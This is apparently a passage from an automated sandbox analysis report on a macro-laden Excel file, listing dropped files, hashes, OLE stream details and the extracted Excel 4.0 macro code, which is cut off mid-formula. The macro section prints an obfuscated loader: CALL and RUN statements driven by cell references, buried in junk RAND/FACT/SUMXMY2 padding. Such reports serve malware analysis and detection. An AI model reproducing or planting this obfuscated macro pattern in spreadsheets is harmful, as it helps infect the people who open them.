                    Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):3.149293041712096
                    Encrypted:false
                    SSDEEP:6:kKupkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:2phZkPlE99SNxAhUeSKO
                    MD5:ECD3D1AF4E4373E0181DFB0B1FA2CC0F
                    SHA1:D2064794D7D6789E2FCD07E03B8965FFF478BFE5
                    SHA-256:49B62B2249AFE948DF7FECB5CD9C8C16B32D40857BAC6A55B8C9C81CAC9EA7DC
                    SHA-512:AF94F836572D477252D25C8628BAC820540F60853B5E6C33E86B9D6C5879D2D43DBA48CCA32F40451F1D19F1995C35F8519DEC8BEC4A7ADAED323B3D781BAF09
                    Malicious:false
                    Reputation:low
                    Preview: p...... ............G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):2.993334444389092
                    Encrypted:false
                    SSDEEP:3:kkFklGkfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWlP1:kKhZQE1liBAIdQZV7ulPPN
                    MD5:E2B0359C2946B2A83C00D72E7E7FF482
                    SHA1:590FC172CD2BDB299D90A5751C7AB67B5C8C09A0
                    SHA-256:346AFB6BCF970C31656589832060D8A0514D1F1968B086171886AA0FD179A6D5
                    SHA-512:ABD758F7BEE2B8EF727C3F55B20763DEF69E0EFD299040EDA15C48E79CE7738A142C18B280C4CF7B42D6877063CC808FAEC9822F1FD79257113C97404D2FE0A6
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....`....e..G..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                    C:\Users\user\AppData\Local\Temp\88EE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):81161
                    Entropy (8bit):7.9023078240565345
                    Encrypted:false
                    SSDEEP:1536:TeKmfTWbSDcn9iZtJOXAQR2KtCbuMB/yDL4W0DeOkIwXEy:TALWbSD8YZo/Uh0D0D3kIkH
                    MD5:BB9502F4155E166F9BA0D791ACA4E23D
                    SHA1:B80D13B175E28961585738A9AB265F738AF40928
                    SHA-256:3FC637F0B7EA304D0A93EEB1630077998107C31C3BD1CC6687B1C46C6CB2C7B3
                    SHA-512:6BBE4D4B3D2E95572DE0C7E87A0A0F15D74051445842E3622E8F8DFD4CD2F9B55387DDE05CA98FC0ADC176977285DF4F84781D0C50AFC55C809E736C8C8AAA40
                    Malicious:false
                    Reputation:low
                    Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\CabF2E8.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                    Category:dropped
                    Size (bytes):59863
                    Entropy (8bit):7.99556910241083
                    Encrypted:true
                    SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                    MD5:15775D95513782F99CDFB17E65DFCEB1
                    SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                    SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                    SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                    C:\Users\user\AppData\Local\Temp\TarF2E9.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):156386
                    Entropy (8bit):6.3086528024913715
                    Encrypted:false
                    SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                    MD5:78CABD9F1AFFF17BB91A105CF4702188
                    SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                    SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                    SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                    Malicious:false
                    Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 11:15:45 2021, atime=Thu May 13 11:15:45 2021, length=12288, window=hide
                    Category:dropped
                    Size (bytes):867
                    Entropy (8bit):4.498209057111674
                    Encrypted:false
                    SSDEEP:12:85QEcLgXg/XAlCPCHaXEKB8VXB/KVGAX+WnicvbFbDtZ3YilMMEpxRljKZTdJP9O:85JK/XT0K6VX0PYedDv3q0rNru/
                    MD5:D9031EEBF26356BB3BABEE39A8BF22FF
                    SHA1:4C8AD2C406A62B025AEA637E5FD4193EA7609418
                    SHA-256:D77F8D4FAD6F9B33E53CF8F38EDEB1B6FEECDA4042237AE74629DA40708D5B6A
                    SHA-512:8474DEC17B44FEAEB826464756FB18EFB409C419D7DFC7DB7AC47E5A30B48A6CF0B8008865F24696B1CECDCD4F80B7F52BC97937CC535498F80872F4B7A5B25B
                    Malicious:false
                    Preview: L..................F...........7G....<..G....<..G...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.a..Desktop.d......QK.X.R.a*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-419065597.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Thu May 13 11:15:45 2021, atime=Thu May 13 11:15:45 2021, length=174080, window=hide
                    Category:dropped
                    Size (bytes):2098
                    Entropy (8bit):4.5585178670148885
                    Encrypted:false
                    SSDEEP:48:8I/XT0ZVXbFA0p7J0Qh2I/XT0ZVXbFA0p7J0Q/:8I/XuVXbS+7J0Qh2I/XuVXbS+7J0Q/
                    MD5:338443857F50DEF0A1269BB8ADDEEA5E
                    SHA1:577E0349B370CE8D74A47359572DEF30915D4550
                    SHA-256:D2F7770F22BD0E689D432841E69CD4B4C9B0663C27BD397B97DA8BA33800F10C
                    SHA-512:16994874C15DD1338FD0E8D3A5D1A45138881328BC21938B434A458F67DE17A1C60BCC31848FCD5249CE908EA23E134286338B55D510F0BF9502A2BDB39CB042
                    Malicious:false
                    Preview: L..................F.... .......{....<..G...KV..G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2......R.a .DIAGRA~1.XLS..X.......Q.y.Q.y*...8.....................d.i.a.g.r.a.m.-.4.1.9.0.6.5.5.9.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop\diagram-419065597.xls.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.i.a.g.r.a.m.-.4.1.9.0.6.5.5.9.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9F.C
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):104
                    Entropy (8bit):4.801361621988822
                    Encrypted:false
                    SSDEEP:3:oyBVomMXCU7KSYZFd7KSYmMXCU7KSYv:dj6XCRSC+SKXCRSC
                    MD5:94036EFD5D6B12AB4378E234BAA91B0D
                    SHA1:5FBA99F3043E4F618FE80C93A75CBD8C7D8FEC0A
                    SHA-256:F9CD6390630DAD2881B0094C6007593A6FB1D10305BBE2168B87027F67FDFF29
                    SHA-512:73D726A6E1F2ACF96E7FCCA45DBB9C4A7A114F231EF063312698A2F2BC6A9816153A8C6AFD22E1619FD43EE35600DA461EEFDCB853666354B2E84D138EDA9329
                    Malicious:false
                    Preview: Desktop.LNK=0..[xls]..diagram-419065597.LNK=0..diagram-419065597.LNK=0..[xls]..diagram-419065597.LNK=0..
                    C:\Users\user\Desktop\89EE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Applesoft BASIC program data, first line number 16
                    Category:dropped
                    Size (bytes):205225
                    Entropy (8bit):5.6442453650812325
                    Encrypted:false
                    SSDEEP:3072:3l8iWBSD8YNoDUF078AH7RDHCjnTDPBarvvrAXrul8i4w:rWBTLDUFC81I4w
                    MD5:CE4D8E82BE66238B8E21A1362AF3095A
                    SHA1:1DECF537A1806AA2ECAEDE99F92563C088CA0FBE
                    SHA-256:5F14E0BA523C083C3D09B3515E54643B959FDD9F00ED70F2A72A0964A323930F
                    SHA-512:052164129BCD5EEDDB24A44C1F79571EDD66D8D249F330A2D9111405741A3793EC0B88F025D37AB6CC32C9CBB3AFC0051AC9E89048C9D72D80F0295343CFD266
                    Malicious:false
                    Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                    Static File Info

                    General

                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:22:48 2021, Security: 0
                    Entropy (8bit):3.261681103749055
                    TrID:
                    • Microsoft Excel sheet (30009/1) 78.94%
                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                    File name:diagram-419065597.xls
                    File size:375808
                    MD5:ec968745c407ee67d80d18c25abaa8d2
                    SHA1:922818d6a781b3780541837975c54baa4e7a3349
                    SHA256:431c2a2e6969ba3aa239af68c3150d86837b3e58bc80b2690b91cf39d459ac55
                    SHA512:8b8e26f86ec06bc25718036c5d94c794014f02d5d4e9ce605d25713becf43e97fdcce82636df650c66bebb930f5b32ea00f52f07470708bd7953dcd153f0b574
                    SSDEEP:3072:Q8UMKE+Y6t/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/2zfOTfFG4l+s2/7nU5BLP:vUMIt6Uqa5DPdG9uS9QLA4l+sBqO
                    File Content Preview:........................>......................................................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4eea286a4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "diagram-419065597.xls"

                    Indicators

                    Has Summary Info:True
                    Application Name:Microsoft Excel
                    Encrypted Document:False
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Code Page:1251
                    Author:van-van
                    Last Saved By:vi-vi
                    Create Time:2006-09-16 00:00:00
                    Last Saved Time:2021-05-12 07:22:48
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Document Code Page:1251
                    Thumbnail Scaling Desired:False
                    Contains Dirty Links:False

                    Streams

                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.287037498961
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5SummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.288480529966
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363297
                    General
                    Stream Path:Book
                    File Type:Applesoft BASIC program data, first line number 8
                    Stream Size:363297
                    Entropy:3.24802119785
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                    Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                    Macro 4.0 Code

                    CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)

                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUM